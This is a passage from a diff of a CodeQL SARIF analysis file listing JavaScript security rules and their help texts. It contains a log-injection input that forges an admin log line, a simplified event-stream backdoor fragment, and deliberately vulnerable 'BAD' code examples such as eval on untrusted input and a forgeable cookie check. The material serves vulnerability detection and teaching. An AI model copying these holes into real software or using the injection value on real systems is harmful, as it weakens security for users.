\\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n // GOOD: remove newlines from user controlled input before logging\n let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n", + "markdown" : "# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n // GOOD: remove newlines from user controlled input before logging\n let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-117" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/log-injection", + "kind" : "path-problem", + "name" : "Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/password-in-configuration-file", + "name" : "js/password-in-configuration-file", + "shortDescription" : { + "text" : "Password in configuration file" + }, + "fullDescription" : { + "text" : "Storing unencrypted passwords in configuration files is unsafe." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Password in configuration file\nStoring a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resources. Therefore it is a common attack vector.\n\n\n## Recommendation\nPasswords stored in configuration files should always be encrypted.\n\n\n## References\n* Common Weakness Enumeration: [CWE-256](https://cwe.mitre.org/data/definitions/256.html).\n* Common Weakness Enumeration: [CWE-260](https://cwe.mitre.org/data/definitions/260.html).\n* Common Weakness Enumeration: [CWE-313](https://cwe.mitre.org/data/definitions/313.html).\n* Common Weakness Enumeration: [CWE-522](https://cwe.mitre.org/data/definitions/522.html).\n", + "markdown" : "# Password in configuration file\nStoring a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resources. Therefore it is a common attack vector.\n\n\n## Recommendation\nPasswords stored in configuration files should always be encrypted.\n\n\n## References\n* Common Weakness Enumeration: [CWE-256](https://cwe.mitre.org/data/definitions/256.html).\n* Common Weakness Enumeration: [CWE-260](https://cwe.mitre.org/data/definitions/260.html).\n* Common Weakness Enumeration: [CWE-313](https://cwe.mitre.org/data/definitions/313.html).\n* Common Weakness Enumeration: [CWE-522](https://cwe.mitre.org/data/definitions/522.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-256", "external/cwe/cwe-260", "external/cwe/cwe-313", "external/cwe/cwe-522" ], + "description" : "Storing unencrypted passwords in configuration files is unsafe.", + "id" : "js/password-in-configuration-file", + "kind" : "problem", + "name" : "Password in configuration file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/empty-password-in-configuration-file", + "name" : "js/empty-password-in-configuration-file", + "shortDescription" : { + "text" : "Empty password in configuration file" + }, + "fullDescription" : { + "text" : "Failing to set a password reduces the security of your code." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n", + "markdown" : "# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-258", "external/cwe/cwe-862" ], + "description" : "Failing to set a password reduces the security of your code.", + "id" : "js/empty-password-in-configuration-file", + "kind" : "problem", + "name" : "Empty password in configuration file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/hardcoded-data-interpreted-as-code", + "name" : "js/hardcoded-data-interpreted-as-code", + "shortDescription" : { + "text" : "Hard-coded data interpreted as code" + }, + "fullDescription" : { + "text" : "Transforming hard-coded data (such as hexadecimal constants) into code to be executed is a technique often associated with backdoors and should be avoided." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n", + "markdown" : "# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-506" ], + "description" : "Transforming hard-coded data (such as hexadecimal constants) into code\n to be executed is a technique often associated with backdoors and should\n be avoided.", + "id" : "js/hardcoded-data-interpreted-as-code", + "kind" : "path-problem", + "name" : "Hard-coded data interpreted as code", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "9.1" + } + }, { + "id" : "js/user-controlled-bypass", + "name" : "js/user-controlled-bypass", + "shortDescription" : { + "text" : "User-controlled bypass of security check" + }, + "fullDescription" : { + "text" : "Conditions that the user controls are not suited for making security-related decisions." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.cookies.loggedInUserId !== req.params.userId) {\n // BAD: login decision made based on user controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.signedCookies.loggedInUserId !== req.params.userId) {\n // GOOD: login decision made based on server controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n", + "markdown" : "# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.cookies.loggedInUserId !== req.params.userId) {\n // BAD: login decision made based on user controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.signedCookies.loggedInUserId !== req.params.userId) {\n // GOOD: login decision made based on server controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-807", "external/cwe/cwe-290" ], + "description" : "Conditions that the user controls are not suited for making security-related decisions.", + "id" : "js/user-controlled-bypass", + "kind" : "path-problem", + "name" : "User-controlled bypass of security check", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/unsafe-code-construction", + "name" : "js/unsafe-code-construction", + "shortDescription" : { + "text" : "Unsafe code constructed from library input" + }, + "fullDescription" : { + "text" : "Using externally controlled strings to construct code may allow a malicious user to execute arbitrary code." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Using externally controlled strings to construct code may allow a malicious\n user to execute arbitrary code.", + "id" : "js/unsafe-code-construction", + "kind" : "path-problem", + "name" : "Unsafe code constructed from library input", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/samesite-none-cookie", + "name" : "js/samesite-none-cookie", + "shortDescription" : { + "text" : "Sensitive cookie without SameSite restrictions" + }, + "fullDescription" : { + "text" : "Sensitive cookies where the SameSite attribute is set to \"None\" can in some cases allow for Cross-Site Request Forgery (CSRF) attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n", + "markdown" : "# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1275" ], + "description" : "Sensitive cookies where the SameSite attribute is set to \"None\" can\n in some cases allow for Cross-Site Request Forgery (CSRF) attacks.", + "id" : "js/samesite-none-cookie", + "kind" : "problem", + "name" : "Sensitive cookie without SameSite restrictions", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/file-system-race", + "name" : "js/file-system-race", + "shortDescription" : { + "text" : "Potential file system race condition" + }, + "fullDescription" : { + "text" : "Separately checking the state of a file before operating on it may allow an attacker to modify the file between the two operations." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n", + "markdown" : "# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-367" ], + "description" : "Separately checking the state of a file before operating\n on it may allow an attacker to modify the file between\n the two operations.", + "id" : "js/file-system-race", + "kind" : "problem", + "name" : "Potential file system race condition", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.7" + } + }, { + "id" : "js/insecure-temporary-file", + "name" : "js/insecure-temporary-file", + "shortDescription" : { + "text" : "Insecure temporary file" + }, + "fullDescription" : { + "text" : "Creating a temporary file that is accessible by other users can lead to information disclosure and sometimes remote code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n", + "markdown" : "# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n" + }, + "properties" : { + "tags" : [ "external/cwe/cwe-377", "external/cwe/cwe-378", "security" ], + "description" : "Creating a temporary file that is accessible by other users can\n lead to information disclosure and sometimes remote code execution.", + "id" : "js/insecure-temporary-file", + "kind" : "path-problem", + "name" : "Insecure temporary file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.0" + } + }, { + "id" : "js/summary/lines-of-code", + "name" : "js/summary/lines-of-code", + "shortDescription" : { + "text" : "Total lines of JavaScript and TypeScript code in the database" + }, + "fullDescription" : { + "text" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "summary" ], + "description" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments.", + "id" : "js/summary/lines-of-code", + "kind" : "metric", + "name" : "Total lines of JavaScript and TypeScript code in the database" + } + }, { + "id" : "js/summary/lines-of-user-code", + "name" : "js/summary/lines-of-user-code", + "shortDescription" : { + "text" : "Total lines of user written JavaScript and TypeScript code in the database" + }, + "fullDescription" : { + "text" : "The total number of lines of JavaScript and TypeScript code from the source code directory, excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding whitespace or comments." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "summary", "lines-of-code" ], + "description" : "The total number of lines of JavaScript and TypeScript code from the source code directory,\n excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding\n whitespace or comments.", + "id" : "js/summary/lines-of-user-code", + "kind" : "metric", + "name" : "Total lines of user written JavaScript and TypeScript code in the database" + } + } ], + "locations" : [ { + "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + } ] }, - "error": { - "+": 0, - "-": 0, - "codes": {} + "invocations" : [ { + "toolExecutionNotifications" : [ { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/actions/install-codeql/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 5 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : 